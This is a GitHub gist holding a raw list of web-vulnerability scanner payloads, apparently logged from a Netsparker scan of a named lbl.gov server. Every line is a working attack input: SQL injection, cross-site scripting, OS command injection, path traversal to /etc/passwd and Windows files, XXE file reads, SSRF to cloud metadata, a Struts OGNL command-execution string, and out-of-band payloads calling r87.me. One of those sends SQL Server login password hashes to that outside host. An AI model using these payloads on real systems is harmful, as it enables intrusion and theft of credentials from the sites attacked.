Created
January 26, 2018 11:31
-
-
Save simon-mo/a42a4a7c72d826ffdbc2fce882e22d89 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| '', | |
| 'netsparker@example.com', | |
| '%27', | |
| '1 OR 1=1', | |
| "'", | |
| '(select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)', | |
| 'NS1NO', | |
| "1 AND 'NS='ss", | |
| "' WAITFOR DELAY '0:0:25'--", | |
| "1' OR 1=1 OR 'ns'='ns", | |
| "'+ (select convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns) +'", | |
| '1 OR 17-7=10', | |
| "1 OR X='ss", | |
| "1 WAITFOR DELAY '0:0:25'--", | |
| "1' OR 1=1 OR '1'='1", | |
| 'convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))', | |
| "WAITFOR DELAY '0:0:25'--", | |
| "'AND 1=cast(0x5f21403264696c656d6d61 as varchar(8000)) or '1'='", | |
| "1) WAITFOR DELAY '0:0:25'--", | |
| '-1 or 1=1 and (SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)', | |
| 'n3tsp4rke2', | |
| 'nxtspxrkex', | |
| 'N3TSP4RKE2', | |
| "') WAITFOR DELAY '0:0:25'--", | |
| '\'"--></style></scRipt><scRipt>netsparker(0x0007C7)</scRipt>', | |
| "-1' and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'", | |
| '"& SET /A 0xFFF9999-2 &', | |
| '\'"--></style></scRipt><scRipt>netsparker(0x0007C8)</scRipt>', | |
| '%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x0007CB%29%3C%2FscRipt%3E', | |
| '-1" and 6=3 or 1=1+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+"', | |
| "'& SET /A 0xFFF9999-2 &", | |
| '%27%22--%3E%3C%2Fstyle%3E%3C%2FscRipt%3E%3CscRipt%3Enetsparker%280x0007CC%29%3C%2FscRipt%3E', | |
| 'data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwN0NEKTwvc2NyaXB0Pg==', | |
| '(SELECT CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))', | |
| '& SET /A 0xFFF9999-2 &', | |
| 'data:;base64,JyI+PHNjcmlwdD5uZXRzcGFya2VyKDB4MDAwN0NFKTwvc2NyaXB0Pg==', | |
| '\'" ns=netsparker(0x0007CF) ', | |
| 'cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)', | |
| '\'" ns=netsparker(0x0007D0) ', | |
| "')) WAITFOR DELAY '0:0:25'--", | |
| '1 ns=netsparker(0x0007D1) ', | |
| '"& ping -n 25 127.0.0.1 &', | |
| "'||cast((select chr(95)||chr(33)||chr(64)||chr(53)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)) as numeric)||'", | |
| '1 ns=netsparker(0x0007D2) ', | |
| '//r87.com/n/n.css?0x0007DB', | |
| 'SET /A 0xFFF9999-2 &', | |
| '(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL)', | |
| '//r87.com/n/n.css?0x0007DC', | |
| '//r87.com/n/j/?0x0007DD', | |
| 'SET /A 0xFFF9999-2', | |
| 'NSFTW', | |
| '//r87.com/n/j/?0x0007DE', | |
| "'><net sparker=netsparker(0x0007DF)>", | |
| "1)) WAITFOR DELAY '0:0:25'--", | |
| '| SET /A 0xFFF9999-2', | |
| "'+NSFTW+'", | |
| "'><net sparker=netsparker(0x0007E0)>", | |
| "'& ping -n 25 127.0.0.1 &", | |
| '"><net sparker=netsparker(0x0007E1)>', | |
| '1));DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--', | |
| '"><net sparker=netsparker(0x0007E2)>', | |
| '& ping -n 25 127.0.0.1 &', | |
| '<iMg src=N onerror=netsparker(0x0007E3)>', | |
| '1;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--', | |
| '<iMg src=N onerror=netsparker(0x0007E4)>', | |
| 'ping -n 25 127.0.0.1 &', | |
| 'javascript:netsparker(0x0007E5)', | |
| '1);DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--', | |
| 'javascript:netsparker(0x0007E6)', | |
| '<scRipt>ns(0x0007E7)</scRipt>', | |
| '(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)', | |
| '<scRipt>ns(0x0007E8)</scRipt>', | |
| '1";expr 268409241 - 2;"', | |
| '<%a style=x:expre/**/ssion(netsparker(0x0007E9))>', | |
| "-1'+(SELECT 1 and ROW(1,1)>(SELECT COUNT(*),CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97),0x3a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.COLLATIONS GROUP BY x)a)+'", | |
| '<%a style=x:expre/**/ssion(netsparker(0x0007EA))>', | |
| "1';expr 268409241 - 2;'", | |
| '"&ping -w 25 127.0.0.1 &"', | |
| 'n;ns:expression(netsparker(0x0007EB));', | |
| "-1\\'+(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))-- 1", | |
| 'n;ns:expression(netsparker(0x0007EC));', | |
| '1;expr 268409241 - 2;x', | |
| 'syscolumns WHERE 2>3;DECLARE/**/@x/**/char(9);SET/**/@x=char(48)+char(58)+char(48)+char(58)+char(50)+char(53);WAITFOR/**/DELAY/**/@x--', | |
| 'body{x:expression(netsparker(0x0007ED))}', | |
| '1 procedure analyse(extractvalue(rand(),concat(0x3a,CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)))),1)-- 1', | |
| 'body{x:expression(netsparker(0x0007EE))}', | |
| 'expr 268409241 - 2;', | |
| '*/netsparker(0x0007EF);/*', | |
| '(length(CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))))', | |
| '*/netsparker(0x0007F0);/*', | |
| 'expr 268409241 - 2', | |
| "'&ping -w 25 127.0.0.1 &'", | |
| "'+netsparker(0x0007F1)+'", | |
| "'||CTXSYS.DRITHSX.SN(user,(select chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97) from DUAL))||'", | |
| '<!--#exec cmd="expr 268409241 - 2"-->', | |
| "'+netsparker(0x0007F2)+'", | |
| '&ping -w 25 127.0.0.1 &', | |
| '"+netsparker(0x0007F3)+"', | |
| "'+convert(int, cast(0x5f21403264696c656d6d61 as varchar(8000)))+'", | |
| '1 + ((SELECT 1 FROM (SELECT SLEEP(25))A))/*\'XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR\'|"XOR(((SELECT 1 FROM (SELECT SLEEP(25))A)))OR"*/', | |
| '|expr${IFS}268409241${IFS}-${IFS}2', | |
| '"+netsparker(0x0007F4)+"', | |
| 'ping -w 25 127.0.0.1 &', | |
| "\\';netsparker(0x0007F5);///", | |
| '-1 AND ((SELECT 1 FROM (SELECT 2)a WHERE 1=sleep(25)))-- 1', | |
| 'ping -n 25 127.0.0.1', | |
| "\\';netsparker(0x0007F6);///", | |
| '',netsparker(0x0007F7),'', | |
| '',netsparker(0x0007F8),'', | |
| ' netsparker(0x0007F9) ', | |
| ' netsparker(0x0007FA) ', | |
| '\nnetsparker(0x0007FB);', | |
| '\nnetsparker(0x0007FC);', | |
| ''+netsparker(0x0007FD)+'', | |
| 'ping -w 25 127.0.0.1', | |
| '((select sleep(25)))a-- 1', | |
| '/../../../../../../../../../../boot.ini', | |
| ''+netsparker(0x0007FE)+'', | |
| '\'"@--></style></scRipt><scRipt>netsparker(0x0007FF)</scRipt>', | |
| '\'"@--></style></scRipt><scRipt>netsparker(0x000800)</scRipt>', | |
| '//r87.com/?0x000827', | |
| '//r87.com/?0x000828', | |
| '|ping -n 25 127.0.0.1', | |
| '/../../../../../../../../../../boot.ini\x00.php', | |
| '(select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual)', | |
| '1/../../../../../../../../../../boot.ini', | |
| "1' || (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) || '", | |
| 'file:/boot.ini', | |
| '1 + (select dbms_pipe.receive_message((chr(95)||chr(33)||chr(64)||chr(51)||chr(100)||chr(105)||chr(108)||chr(101)||chr(109)||chr(109)||chr(97)),25) from dual) + 1', | |
| 'c:\\boot.ini', | |
| "1';SELECT pg_sleep(25)--", | |
| 'ns../../../../../../../../../../../boot.ini.......................................................................................................................................................................................', | |
| '1;SELECT pg_sleep(25)--', | |
| '%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini', | |
| 'SELECT pg_sleep(25)--', | |
| 'file%3a%2fboot.ini', | |
| '1);SELECT pg_sleep(25)--', | |
| 'c%3a%5cboot.ini', | |
| "1');SELECT pg_sleep(25)--", | |
| '/../../../../../../../../../../web.config', | |
| "1'));SELECT pg_sleep(25)--", | |
| '/../../../../../../../../../../windows/win.ini', | |
| '1));SELECT pg_sleep(25)--', | |
| 'file:/windows/win.ini', | |
| '((SELECT 1 FROM (SELECT SLEEP(25))A))', | |
| '/../../../../../../../../../../windows/win.ini\x00.php', | |
| "'+((SELECT 1 FROM (SELECT SLEEP(25))A))+'", | |
| 'c:\\windows\\win.ini', | |
| "-1' or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+'", | |
| '...//...//...//...//...//...//...//...//...//...//...//windows/win.ini', | |
| '-1 or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))', | |
| '....//....//....//....//....//....//....//....//....//....//....//windows/win.ini', | |
| '-1" or 1=((SELECT 1 FROM (SELECT SLEEP(25))A))+"', | |
| '.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///windows/win.ini', | |
| '. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /windows/win.ini', | |
| '/../../../../../../../../../../windows/iis6.log', | |
| '/../../../../../../../../../../proc/self/fd/2', | |
| '/../../../../../../../../../../proc/self/fd/2\x00.php', | |
| '/../../../../../../../../../../etc/httpd/logs/error.log', | |
| '/../../../../../../../../../../etc/httpd/logs/error_log', | |
| '/../../../../../../../../../../var/log/apache2/error.log', | |
| '/../../../../../../../../../../var/log/apache/error.log', | |
| '/../../../../../../../../../../proc/version', | |
| '/../../../../../../../../../../proc/version\x00.php', | |
| '/../../../../../../../../../../../etc/passwd', | |
| 'file:///etc/passwd', | |
| '/../../../../../../../../../../../etc/passwd\x00', | |
| '/../../../../../../../../../../../etc/passwd\x00.php', | |
| '...//...//...//...//...//...//...//...//...//...//...//etc/passwd', | |
| '....//....//....//....//....//....//....//....//....//....//....//etc/passwd', | |
| '.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///.....///etc/passwd', | |
| '. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /. . /etc/passwd', | |
| '1/../../../../../../../../../../../etc/passwd', | |
| '/etc/passwd', | |
| '%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd', | |
| 'hTTp://r87.com/n', | |
| 'data:;base64,TlM3NzU0NTYxNDQ2NTc1', | |
| 'http://r87.com/n?\x00.php', | |
| "response.write(268409241-22)'", | |
| 'http://r87.com/n?.php', | |
| "+response.write(268409241-22)'", | |
| 'php://filter//resource=http://r87.com/n?\x00.php', | |
| '"+response.write(268409241-22)+"', | |
| 'r87.com/n', | |
| '<% response.write(268409241-22) %>', | |
| 'print(int)0xFFF9999-22', | |
| 'print(int)0xFFF9999-22;', | |
| '+print(int)0xFFF9999-22;//', | |
| "'+print(int)0xFFF9999-22+'", | |
| '"+print(int)0xFFF9999-22+"', | |
| '<? print(int)0xFFF9999-22;//?>', | |
| '{php}print(int)0xFFF9999-22;{/php}', | |
| "'{${print(int)0xFFF9999-22}}'", | |
| '[php]print(int)0xFFF9999-22;[/php]', | |
| "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='22').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','SET /A 0xFFF9999 -' + #cmd}:{'/bin/bash','-c','expr 268409241 - ' + #cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}", | |
| 'print localtime()*0+0xFFF9999-22', | |
| "eval('print localtime()*0+0xFFF9999-22')", | |
| "'+print localtime()*0+0xFFF9999-22+'", | |
| '"+print localtime()*0+0xFFF9999-22+"', | |
| '\r\nns:netsparker056650=vuln', | |
| "arguments[1].end(require('child_process').execSync('expr 268409241 - 22'))", | |
| 'http://example.com/?\r\nns: netsparker056650=vuln', | |
| "arguments[1].end(require('child_process').execSync('set /A 268409241 - 22'))", | |
| 'ns:netsparker056650=vuln', | |
| '%{#context["com.opensymphony.xwork2.dispatcher.HttpServletResponse"].addHeader("a",268409241-22)}', | |
| '\nns:netsparker056650=vuln', | |
| 'http://r87.com/?nn1.als.lbl.gov/', | |
| '${28275*28275-(13)}', | |
| '#{28275*28275-(13)}', | |
| '//r87.com/?http://nn1.als.lbl.gov/', | |
| '<?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "file:///C:/Windows/System32/drivers/etc/hosts">]><ns>&lfi;</ns>', | |
| 'r87.com/?nn1.als.lbl.gov/', | |
| 'https://nn1.als.lbl.gov/trace.axd', | |
| '<?xml version="1.0"?><!DOCTYPE ns [<!ELEMENT ns ANY><!ENTITY lfi SYSTEM "file:///etc/passwd">]><ns>&lfi;</ns>', | |
| 'nn1.als.lbl.gov/trace.axd', | |
| '131.243.188.15/trace.axd', | |
| '127.100.11.2/trace.axd', | |
| '::1/trace.axd', | |
| '127.0.0.1/trace.axd', | |
| 'https://nn1.als.lbl.gov/elmah.axd', | |
| 'r87.com/?http://nn1.als.lbl.gov/', | |
| 'nn1.als.lbl.gov/elmah.axd', | |
| 'heq1ggqp3s6qxuvltzgta7m9drfuqeaapsh1smzlqge.r87.me', | |
| 'heq1ggqp3sz4pxes7ajqw1awoiklta2u1mxku3it0v8.r87.me', | |
| '131.243.188.15/elmah.axd', | |
| '//heq1ggqp3s0n1yfvxtcdk9xfpspkrlziidrc8zbwcvo.r87.me', | |
| '//heq1ggqp3shnhwkldegpwa1kxytve8hbxwlp28u7zma.r87.me', | |
| '127.100.11.2/elmah.axd', | |
| 'http://r87.me/r/?id=heq1ggqp3smjgqcrmnrkthkmjc9v3l6158a8xpo0uea', | |
| 'http://r87.me/r/?id=heq1ggqp3stdkciy4c7fw-dhno6_jt3jky237cg5nz0', | |
| '::1/elmah.axd', | |
| '127.0.0.1/elmah.axd', | |
| 'r87.com/?https://nn1.als.lbl.gov/', | |
| 'https://nn1.als.lbl.gov/elmah', | |
| 'nn1.als.lbl.gov/elmah', | |
| '131.243.188.15/elmah', | |
| '127.100.11.2/elmah', | |
| '::1/elmah', | |
| '127.0.0.1/elmah', | |
| '/\\r87.com/?nn1.als.lbl.gov/', | |
| 'http://aws.r87.me/latest/meta-data/public-hostname', | |
| 'http://169.254.169.254/latest/meta-data/public-hostname', | |
| "exec('xp_dirtree ''\\\\heq1ggqp3sw0uexyhhjnvqn_wzvxdlpbrdfd9sgy'+'iye.r87.me'+'\\c$\\a''')", | |
| "exec('xp_dirtree ''\\\\heq1ggqp3sqmslnsbakrt8b6az1c4vajv0txpypc'+'cow.r87.me'+'\\c$\\a''')", | |
| "declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.heq1ggqp3sb-6jjbp-9cfkk7txlmc751algnop3p'+'p_u.r87.me' from sys.sql_logins WHERE principal_id=1;exec('xp_dirtree ''\\\\'+@h+'\\c$''')", | |
| 'http://127.0.0.1:22', | |
| "declare @h varchar(999)select @h='1'+substring(name+'-'+master.sys.fn_varbintohexstr(ISNULL(password_hash,0x0)),0,63)+'.heq1ggqp3sodofjxpx80vkyq0hdqzi2mfbet1u3k'+'sdu.r87.me' from sys.sql_logins WHERE principal_id=1;exec('xp_dirtree ''\\\\'+@h+'\\c$''')", | |
| "1;exec('xp_dirtree ''\\\\heq1ggqp3suwcoqysixgj62eaaarawj3ixim16to'+'n3e.r87.me'+'\\c$\\a''')--", | |
| "1;exec('xp_dirtree ''\\\\heq1ggqp3sutw7s_pa2_akonparod5aez0usmf8i'+'0zu.r87.me'+'\\c$\\a''')--", | |
| 'http://131.243.188.15:22', | |
| "-1';exec('xp_dirtree ''\\\\heq1ggqp3sq_ghzhppjciqzwndi7gat6d_li6rhh'+'fbi.r87.me'+'\\c$\\a''')--", | |
| "-1';exec('xp_dirtree ''\\\\heq1ggqp3sdjb97yx9zk6mw1v8gonrtqzmly-lgv'+'3qs.r87.me'+'\\c$\\a''')--", | |
| '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "http://heq1ggqp"><!ENTITY % d "3ss_tetilc5w6qe2xv_nqy0h2untd1ddkua.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>', | |
| "1) exec('xp_dirtree ''\\\\heq1ggqp3sc-fdlc3ehv6afd89snle6acrqdaoed'+'mzu.r87.me'+'\\c$\\a''')--", | |
| 'http://::1:22', | |
| '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "http://heq1ggqp"><!ENTITY % d "3ska2iqrvxe2wy2dcizmkyamouylvq48fis.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>', | |
| "1) exec('xp_dirtree ''\\\\heq1ggqp3skoy1xvtnwspcma1wp6p7lk3ekd9wh6'+'iz4.r87.me'+'\\c$\\a''')--", | |
| '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "php://filter/resource=http://heq1ggqp"><!ENTITY % d "3sd5hnwfspnyyzmhnxokmayu7zssktl8dbq.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>', | |
| "1')exec('xp_dirtree ''\\\\heq1ggqp3so6f-p8j1ezzhyzhqflttvjmwjjeetf'+'5zk.r87.me'+'\\c$\\a''')--", | |
| 'http://127.0.0.1:3306', | |
| "1')exec('xp_dirtree ''\\\\heq1ggqp3sanvbgnsbbvgqhzsrd0uphjp19owl3i'+'wzo.r87.me'+'\\c$\\a''')--", | |
| '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "php://filter/resource=http://heq1ggqp"><!ENTITY % d "3s9dgs2cdbb-vj3nbfvenzsi9onmpebup5e.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>', | |
| "1))exec('xp_dirtree ''\\\\heq1ggqp3sbpiglpdzm0basitzhniln5gi5anoty'+'jba.r87.me'+'\\c$\\a''')--", | |
| '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "php://filter/read=convert.base64-encode/resource=http://heq1ggqp"><!ENTITY % d "3sv_waiojkwgtev6nm2xbcac-2kib1ftpgg.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>', | |
| '///r87.com/?nn1.als.lbl.gov/', | |
| "1))exec('xp_dirtree ''\\\\heq1ggqp3sa7s5gdvcom6q8wspleeioxazsb9odf'+'g5c.r87.me'+'\\c$\\a''')--", | |
| '<?xml version="1.0" encoding="utf-8"?><!DOCTYPE r [<!ENTITY % s "php://filter/read=convert.base64-encode/resource=http://heq1ggqp"><!ENTITY % d "3sux4xkqkmpcmfnq2kbonmtxrmpa_stgho4.r87.me"><!ENTITY % dtd SYSTEM "http://r87.me/dtd"> %dtd;]><r>&a;</r>', | |
| 'http://131.243.188.15:3306', | |
| "1'))exec('xp_dirtree ''\\\\heq1ggqp3s0juypcewp80ytg9_ymqdddavubxeom'+'v-4.r87.me'+'\\c$\\a''')--", | |
| "1'))exec('xp_dirtree ''\\\\heq1ggqp3se5zlqsbu509mdty7vgpbrzeknzxo_r'+'enu.r87.me'+'\\c$\\a''')--", | |
| "syscolumns WHERE 2>3;exec('xp_dirtree ''\\\\heq1ggqp3sgtlmwvhnqaxiutjkwkd4rabzjzbrzu'+'w1k.r87.me'+'\\c$\\a''')--", | |
| 'http://::1:3306', | |
| "syscolumns WHERE 2>3;exec('xp_dirtree ''\\\\heq1ggqp3s7ylgzlleluwtzenqyozxufrsizbkn9'+'xdu.r87.me'+'\\c$\\a''')--", | |
| "DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','heq1ggqp3slolv5s71fwtlq4umjhq29avdysl2jn'+'toa.r87.me')exec sp_executesql @r", | |
| "DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','heq1ggqp3son-sqmxb-ei7qx-euflkmst9josw3v'+'yhq.r87.me')exec sp_executesql @r", | |
| 'https://nn1.als.lbl.gov/server-status', | |
| "1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','heq1ggqp3sv8yr789ya8pfaef_u9uo0ce3ul8oiv'+'kba.r87.me')exec sp_executesql @r--", | |
| "1;DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','heq1ggqp3sosn-o2ujzoxnlc5v6xu7nqa-aojmip'+'tow.r87.me')exec sp_executesql @r--", | |
| "-1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','heq1ggqp3sk8rtnnpbcmnbhmpjxgfc1kpywgdmex'+'edk.r87.me')exec sp_executesql @r--", | |
| "-1';DECLARE @q varchar(999),@r nvarchar(999)SET @q = 'SELECT * FROM OPENROWSET(''SQLOLEDB'',''@'';''a'';''1'',''SELECT 1'')'SET @r=replace(@q,'@','heq1ggqp3sben7ifx6nkvd76cb9jwi89dtanfvz8'+'yly.r87.me')exec sp_executesql @r--", | |
| "SELECT dblink_connect('host=heq1ggqp3sec2hvwxls4cieqbzjweiuzikylcqjf'||'mue.r87.me user=a password=a connect_timeout=2')", | |
| "SELECT dblink_connect('host=heq1ggqp3scjb3or4ilozkq-gsgma7e-buyduhv4'||'n2g.r87.me user=a password=a connect_timeout=2')", | |
| "dblink_connect('host=heq1ggqp3sm7jttht_mzny0csqthhk4xpopdt3cc'||'bcc.r87.me user=a password=a connect_timeout=2')", | |
| "dblink_connect('host=heq1ggqp3sdmyz8sj-2trer_ytnduqfrl5cy6zzc'||'bdg.r87.me user=a password=a connect_timeout=2')", | |
| "cast((SELECT dblink_connect('host=heq1ggqp3sw-i3ali1j62fwjppeevlq1uy3v0lwd'||'rlk.r87.me user=a password=a connect_timeout=2')) as numeric)", | |
| "cast((SELECT dblink_connect('host=heq1ggqp3skb-lvrirghfv_hs2fknfe9_0fm0pob'||'2bq.r87.me user=a password=a connect_timeout=2')) as numeric)", | |
| 'cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(104)||chr(101)||chr(113)||chr(49)||chr(103)||chr(103)||chr(113)||chr(112)||chr(51)||chr(115)||chr(52)||chr(53)||chr(119)||chr(104)||chr(112)||chr(122)||chr(111)||chr(113)||chr(109)||chr(115)||chr(109)||chr(55)||chr(53)||chr(110)||chr(105)||chr(102)||chr(111)||chr(55)||chr(122)||chr(122)||chr(122)||chr(53)||chr(102)||chr(104)||chr(101)||chr(108)||chr(48)||chr(118)||chr(120)||chr(57)||chr(97)||chr(116)||chr(117)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)||chr(32)||chr(117)||chr(115)||chr(101)||chr(114)||chr(61)||chr(97)||chr(32)||chr(112)||chr(97)||chr(115)||chr(115)||chr(119)||chr(111)||chr(114)||chr(100)||chr(61)||chr(97)||chr(32)||chr(99)||chr(111)||chr(110)||chr(110)||chr(101)||chr(99)||chr(116)||chr(95)||chr(116)||chr(105)||chr(109)||chr(101)||chr(111)||chr(117)||chr(116)||chr(61)||chr(50))) as numeric)', | |
| 'cast((SELECT dblink_connect(chr(104)||chr(111)||chr(115)||chr(116)||chr(61)||chr(104)||chr(101)||chr(113)||chr(49)||chr(103)||chr(103)||chr(113)||chr(112)||chr(51)||chr(115)||chr(116)||chr(112)||chr(97)||chr(54)||chr(111)||chr(104)||chr(114)||chr(103)||chr(50)||chr(106)||chr(56)||chr(108)||chr(110)||chr(55)||chr(104)||chr(121)||chr(52)||chr(122)||chr(53)||chr(110)||chr(54)||chr(109)||chr(100)||chr(113)||chr(117)||chr(109)||chr(49)||chr(110)||chr(104)||chr(95)||chr(54)||chr(112)||chr(105)||chr(46)||chr(114)||chr(56)||chr(55)||chr(46)||chr(109)||chr(101)||chr(32)||chr(117)||chr(115)||chr(101)||chr(114)||chr(61)||chr(97)||chr(32)||chr(112)||chr(97)||chr(115)||chr(115)||chr(119)||chr(111)||chr(114)||chr(100)||chr(61)||chr(97)||chr(32)||chr(99)||chr(111)||chr(110)||chr(110)||chr(101)||chr(99)||chr(116)||chr(95)||chr(116)||chr(105)||chr(109)||chr(101)||chr(111)||chr(117)||chr(116)||chr(61)||chr(50))) as numeric)', | |
| "'||(SELECT dblink_connect('host=heq1ggqp3saz3swhamxb9d_sy1t2i4k-hbm9flma'||'fsi.r87.me user=a password=a connect_timeout=2'))||'", | |
| '<iframe src="http://r87.com/?"></iframe>', | |
| '\'"--></style></scRipt><scRipt src="//heq1ggqp3shwzqxwb5saxu7abmzx4_ady432avkqf7w.r87.me"></scRipt>', | |
| "'||(SELECT dblink_connect('host=heq1ggqp3sdxxwrv1-apzf_h4dvmgoqtip6s5k1y'||'1bw.r87.me user=a password=a connect_timeout=2'))||'", | |
| "(select UTL_INADDR.GET_HOST_ADDRESS('heq1ggqp3s0meofw6--fxknzvo-el4tv2-i8sgsk'||'ubm.r87.me') from DUAL)", | |
| '\'"--></style></scRipt><scRipt src="//heq1ggqp3shn5yw8ja_h8o8ffsa1hwngznga9catdny.r87.me"></scRipt>', | |
| "(select UTL_INADDR.GET_HOST_ADDRESS('heq1ggqp3s53oq5qbjygz7oulivnii12ienryvi6'||'hfi.r87.me') from DUAL)", | |
| '<iMg src="//heq1ggqp3s4jhriymui8_fsei5xj7jspq9nlfsr7p9u.r87.me"/>', | |
